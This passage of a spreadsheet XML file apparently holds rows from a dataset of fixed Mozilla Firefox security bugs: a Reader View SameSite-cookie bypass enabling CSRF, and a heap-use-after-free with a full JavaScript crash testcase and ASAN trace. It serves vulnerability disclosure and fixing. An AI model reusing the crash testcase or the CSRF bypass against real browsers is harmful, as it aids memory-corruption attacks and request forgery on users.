      <c r="H4348" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4348" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4348" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4348" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L4348" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4348" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4348" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4348" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main61+]</t>
        </is>
      </c>
      <c r="Q4348" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4348" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4348" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T4348" t="n">
        <v>1</v>
      </c>
      <c r="U4348" t="n">
        <v>0</v>
      </c>
      <c r="V4348" t="n">
        <v>21</v>
      </c>
      <c r="W4348" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Steps to reproduce:
1. Go to https://test.shhnjk.com/read_bypass.html
2. Click reader view icon
3. Click on "Click ME" link
4. Exit Reader view in new tab
Actual results:
SameSite cookie not sent.
Expected results:
SameSite cookie is sent when exiting Reader view at the end.
Firefox doesn't fully track "Site for cookie" when exiting Reader view. Using various tricks in Reader view (target blank with # and meta refresh), attacker can start Reader view from attacker site and navigate to victim site without exiting Reader view. Which makes it possible to end in a state where Reader view holds CSRF payload within Reader view, and it is triggered when exiting Reader view.</t>
        </is>
      </c>
      <c r="X4348" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4349">
      <c r="A4349" t="n">
        <v>1302973</v>
      </c>
      <c r="B4349" t="inlineStr">
        <is>
          <t>2016-09-15 02:46:34 -0700</t>
        </is>
      </c>
      <c r="C4349" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsRefreshDriver::Tick</t>
        </is>
      </c>
      <c r="D4349" t="inlineStr">
        <is>
          <t>2024-05-30 09:21:37 -0700</t>
        </is>
      </c>
      <c r="E4349" t="n">
        <v>1</v>
      </c>
      <c r="F4349" t="n">
        <v>1</v>
      </c>
      <c r="G4349" t="n">
        <v>3</v>
      </c>
      <c r="H4349" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4349" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4349" t="inlineStr">
        <is>
          <t>DOM: Animation</t>
        </is>
      </c>
      <c r="K4349" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4349" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4349" t="inlineStr">
        <is>
          <t>[adv-main50+]</t>
        </is>
      </c>
      <c r="Q4349" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4349" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4349" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T4349" t="n">
        <v>1</v>
      </c>
      <c r="U4349" t="n">
        <v>0</v>
      </c>
      <c r="V4349" t="n">
        <v>32</v>
      </c>
      <c r="W4349" t="inlineStr">
        <is>
          <t>Created attachment 8791529
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20160914134208) as follows. The testcase requires the fuzzPriv extension.
crash.html:
&lt;script&gt;
function start() {
        o0=window.document;
        o1128=document.createElement('iframe');
        try{while(document.removeChild(document.firstChild));}catch(e){}
        o1479=document.implementation.createHTMLDocument();
        o1479.body.appendChild(o1128);
        document.appendChild(o1479.documentElement);
        o1638=frames[0];
        o1639=o1638.document;
        o1773=o1639.createElement('meta');
        o1925=o1773.animate([{listStyleType: 'upper-alpha'},{listStyleType: 'decimal'}],136);
        o1639.write('');
        o1925.play();
        o0.write('');
        o1925=null; o1639=null; o1773=null; o1638=null; o1479=null;
        fuzzPriv.forceGC();fuzzPriv.CC();fuzzPriv.forceGC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==16324==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e000053ef8 at pc 0x7fb55609e7ce bp 0x7ffef123ed90 sp 0x7ffef123ed88
READ of size 8 at 0x60e000053ef8 thread T0 (Web Content)
    #0 0x7fb55609e7cd in AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:37:5
    #1 0x7fb55609e7cd in AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:384
    #2 0x7fb55609e7cd in RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:111
    #3 0x7fb55609e7cd in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1700
    #4 0x7fb5560a820c in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:247:7
    #5 0x7fb5560a7ed9 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:266:5
    #6 0x7fb5560a99c4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:426:9
    #7 0x7fb556a07684 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #8 0x7fb5505a3b8a in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:234:20
    #9 0x7fb55008e63f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1551:16
    #10 0x7fb54ffcded9 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1662:14
    #11 0x7fb54ffcada6 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1600:17
    #12 0x7fb54ffb8d67 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1567:5
    #13 0x7fb54ffe71a2 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #14 0x7fb54ffe71a2 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #15 0x7fb54ffe71a2 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #16 0x7fb54ffe6a2f in Run /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:545:22
    #17 0x7fb54ffe6a2f in mozilla::ipc::MessageChannel::DequeueTask::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:564
    #18 0x7fb54f21272d in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1059:7
    #19 0x7fb54f290fac in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #20 0x7fb54ffd511f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #21 0x7fb54ff48398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #22 0x7fb54ff48398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #23 0x7fb54ff48398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #24 0x7fb5559f7e0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #25 0x7fb557b3ae97 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:12
    #26 0x7fb54ff48398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #27 0x7fb54ff48398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #28 0x7fb54ff48398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #29 0x7fb557b3a3bd in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:7
    #30 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #31 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:367
    #32 0x7fb56a76e82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #33 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60e000053ef8 is located 120 bytes inside of 160-byte region [0x60e000053e80,0x60e000053f20)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fb54f0ee084 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2681:9
    #2 0x7fb54f0edc76 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2855:3
    #3 0x7fb54f0f449c in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3832:3
    #4 0x7fb54f0f3c7c in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3657:9
    #5 0x7fb54f0f6e56 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4148:3
    #6 0x7fb551f96ed9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7fb551b1581d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1338:3
    #8 0x7fb54f238486 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7fb550b603ae in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2065:12
    #10 0x7fb550b603ae in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1384
    #11 0x7fb550b603ae in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1351
    #12 0x7fb550b67acb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
    #13 0x7fb559d9761c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
    #14 0x7fb559d9761c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
    #15 0x7fb559d773a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #16 0x7fb559d773a0 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
    #17 0x7fb559d5c93b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
    #18 0x7fb559d97e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #19 0x7fb559d988a1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #20 0x7fb5598944da in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2776:12
    #21 0x7fb550a9b1af in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
    #22 0x7fb559d9761c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
    #23 0x7fb559d9761c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
    #24 0x7fb559d773a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #25 0x7fb559d773a0 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
    #26 0x7fb559d5c93b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
    #27 0x7fb559d97e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #28 0x7fb559d988a1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #29 0x7fb559896a38 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
    #30 0x7fb5537bf878 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #31 0x7fb5540db041 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #32 0x7fb5540db041 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #33 0x7fb5540a7994 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #34 0x7fb5540a94c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #35 0x7fb5540927b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #36 0x7fb554096c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
previously allocated by thread T0 (Web Content) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0bcd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fb551e8afc4 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fb551e8afc4 in nsDocument::Timeline() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:3023
    #4 0x7fb556360547 in PresShell::Init(nsIDocument*, nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:972:3
    #5 0x7fb551e9229e in nsDocument::doCreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:3630:3
    #6 0x7fb5544896e7 in nsHTMLDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:274:10
    #7 0x7fb5562cdff1 in nsDocumentViewer::InitPresentationStuff(bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:634:16
    #8 0x7fb5562cd915 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:889:10
    #9 0x7fb5562ccad7 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:618:10
    #10 0x7fb55704d1c7 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9374:7
    #11 0x7fb55704b969 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7227:17
    #12 0x7fb557059d4d in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8087:14
    #13 0x7fb556ff9b03 in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7956:17
    #14 0x7fb55702bf87 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4504:3
    #15 0x7fb55702bf87 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4502
    #16 0x7fb551bfbcb7 in MaybeCreateDoc /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3613:38
    #17 0x7fb551bfbcb7 in GetDoc /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:174
    #18 0x7fb551bfbcb7 in EnsureInnerWindow /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:840
    #19 0x7fb551bfbcb7 in nsGlobalWindow::WrapObject(JSContext*, JS::Handle&lt;JSObject*&gt;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.h:354
    #20 0x7fb550ab4a3c in XPCConvert::NativeInterface2JSObject(JS::MutableHandle&lt;JS::Value&gt;, nsIXPConnectJSObjectHolder**, xpcObjectHelper&amp;, nsID const*, bool, nsresult*) /home/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:785:16
    #21 0x7fb550ab29e3 in XPCConvert::NativeData2JS(JS::MutableHandle&lt;JS::Value&gt;, void const*, nsXPTType const&amp;, nsID const*, nsresult*) /home/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:344:16
    #22 0x7fb550b61312 in GatherAndConvertResults /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1601:18
    #23 0x7fb550b61312 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1395
    #24 0x7fb550b61312 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1351
    #25 0x7fb550b6840f in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1929:17
    #26 0x7fb550b6840f in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1179
    #27 0x7fb559d9761c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
    #28 0x7fb559d9761c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
    #29 0x7fb559e337c0 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #30 0x7fb559e337c0 in CallGetter /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:632
    #31 0x7fb559e337c0 in CallGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::Shape*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1757
    #32 0x7fb559da5e05 in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1805:10
    #33 0x7fb559da5e05 in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2032
    #34 0x7fb559da5e05 in NativeGetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2066
    #35 0x7fb559da5e05 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1491
    #36 0x7fb559da5e05 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:846
    #37 0x7fb559da5e05 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4247
    #38 0x7fb559d7bb6b in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:190:12
    #39 0x7fb559d7bb6b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2635
    #40 0x7fb559d5c93b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
    #41 0x7fb559d97e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #42 0x7fb559d988a1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #43 0x7fb5598944da in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2776:12
    #44 0x7fb550b447f1 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1211:23
    #45 0x7fb54f239d06 in PrepareAndDispatch /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:122:14
    #46 0x7fb54f238cd6 in SharedStub (/home/nils/fuzzer3/firefox/libxul.so+0x1faacd6)
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:37:5 in AddRef
Shadow bytes around the buggy address:
  0x0c1c80002780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1c80002790: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1c800027a0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1c800027b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800027c0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=&gt;0x0c1c800027d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]
  0x0c1c800027e0: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1c800027f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1c80002800: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c80002810: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c1c80002820: fa fa fa fa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6324==ABORTING</t>
        </is>
      </c>
      <c r="X4349" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4350">
      <c r="A4350" t="n">
        <v>489050</v>
      </c>
      <c r="B4350" t="inlineStr">
        <is>
          <t>2009-04-19 00:08:30 -0700</t>
        </is>
      </c>
      <c r="C4350" t="inlineStr">
        <is>
          <t>[FIX]Strange rendering bug when javascript is executed: everything is rendered twice</t>
        </is>
      </c>
      <c r="D4350" t="inlineStr">
        <is>
          <t>2009-07-21 17:13:42 -0700</t>
        </is>
      </c>
      <c r="E4350" t="n">
        <v>1</v>
      </c>
      <c r="F4350" t="n">
        <v>1</v>
      </c>
      <c r="G4350" t="n">
        <v>3</v>
      </c>
      <c r="H4350" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4350" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4350" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4350" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4350" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4350" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4350" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4350" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4350" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4350" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4350" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4350" t="n">
        <v>1</v>
      </c>
      <c r="U4350" t="n">
        <v>0</v>
      </c>
      <c r="V4350" t="n">
        <v>25</v>
      </c>
      <c r="W4350" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
I am developing an extension which uses the jQuery library. The reverent aspect of the functionality can be thought of as being a simpler version of Greasemonkey. When a page loads, I execute jQuery in the context of the page and then execute a few other scripts that uses jQuery to modify the page DOM to provide the user with a few convenient features.
There is a bug however with Firefox such that executing jQuery causes certain pages to render twice, as if the entire page has been copy and pasted. I have provided a stripped down version of my extension which demonstrates this effect. In this version, jQuery is injected into the page in the form of a script tag but it also occurs if jQuery is executed by evalInSandbox.
I do not believe this is a jQuery bug since it works fine when I include it in the html file. It only triggers the bug when injected or eval'ed in evalInSandbox.
Reproducible: Always
Steps to Reproduce:
1. Install the provided xpi
2. open up the included html or go to http://www.bagelwood.com/forums/
3. You may need to refresh the page
4. Everything is rendered twice!
Actual Results:  
Everything is rendered twice!
Expected Results:  
Everything is rendered only once.</t>
        </is>
      </c>
      <c r="X4350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4351">
      <c r="A4351" t="n">
